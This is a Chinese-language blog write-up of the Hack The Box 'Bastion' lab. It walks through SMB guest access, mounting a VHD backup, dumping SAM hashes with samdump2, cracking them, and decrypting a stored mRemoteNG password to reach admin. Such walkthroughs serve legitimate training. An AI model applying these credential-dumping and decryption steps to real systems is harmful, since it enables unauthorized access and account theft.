2019年9月18日 星期三

[Hack The Box] Bastion Write-up 解法


Hack The Box - Bastion Write-up
首先使用NMAP掃描   
nmap -sV -T4 -O -F --version-light 10.10.10.134
-F 加快掃描
-sV需要各種服務



smbmap -L 10.10.10.134

smbclient    //連線SMB伺服器的工具
指令格式:smbclient L [SMB伺服器IP] [參數]
-p:指定連線port number
-U 使用者名稱:指定使用者名稱
-L List all drives on the specified host 
帳號可使用 Guest

我們發現 使用Guest  密碼空白就可以access


Windows 這邊指令我很不熟 所以看了很多教學
參考如下:


使用cd時候最後要列出Backup 2019-02-22 12351內的檔案
最後指令資料夾路徑要加入” ”  (括號) 
我在這邊卡的時間蠻長的
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"

發現是vhd , Linux下使用mount 將檔案下載下來
因為Mount 不常使用 所以不熟 也看了很多資料 如下:


指令:
mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC  ~/Desktop/mount -o user=anonymous
會顯示:
Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC: 
接著直接按Enter



SAMSYSTE複製出來
1.     掛載VHD

但檔案真的很肥 去回去找了LINUX上方式

Mounting the Backup Image, Dumping Credentials, User Flag


These vhd images are the system backup files. As the note said, trying to download them will take a very long time and probably won’t finish because of their big size, so instead we will mount them, I wanted to look at
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd first. This was helpful.

後來發現還是Mount 不用整個載下來((Windows下我解不出來))
所以上面浪費了一點時間XD 回到Kali

mount上檔案
root@kali:~# mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC  /mnt/L4mpje-PC/ -o user=anonymous

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC: 
root@kali:~# qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

root@kali:~# mount -r /dev/nbd0p1 /mnt/vhd
root@kali:~# cd /mnt/vhd


接下來要找到SAMSYSTEM的檔案放置處
System32/Config

使用指令 samdump2 SYSTEM SAM


Windows格式是Ntlm  去反解
26112010952d963c8dc4217daec986d9



接下來連線回去主機登入
Kali內用ssh連線                                                                          
L4mpje@10.10.10.134    密碼是解出來的bureaulampje


在桌面 把檔案用type找出來
9bXXXXXXXXXXXXXXXXXXcd



我試著輸入root
沒有結果 
hack the box 輸入解答
得到分數


----------------------------------------------------
尋找Root:
C:\Users\L4mpje\AppData\Roaming
這邊可以知道Windows下有安裝甚麼東西
發現了一個可以遠端的程式 mRemoteNG
(mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.
It allows you to view all of your remote connections in a simple yet powerful tabbed interface. -mremoteng.org
)


找到該資料夾下的confCons.xml


將檔案下載下來 最後一個.是當前目錄
scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .


我用nano打開confCons.xml
找到Admin 後面的password


aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

base 64 decode解不開


上網查一下 他有先處理過才base64
使用這套工具來解


python3 NG.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==



密碼為 :
thXLHM96BeKL0ER2

接著SSH登入
thXLHM96BeKL0ER2




解出來為
95XXXXXXXXXXXXXXXXXXXXXc8

拋回去解Own Root

沒有留言:

張貼留言

文章目錄分類

文章目錄 文章同步發表於medium(推薦) https://medium.com/blacksecurity 網路管理 Cisco [Cisco] 流量側錄功能-SPAN (Mirror port) [Cisco] Router 與 Lay...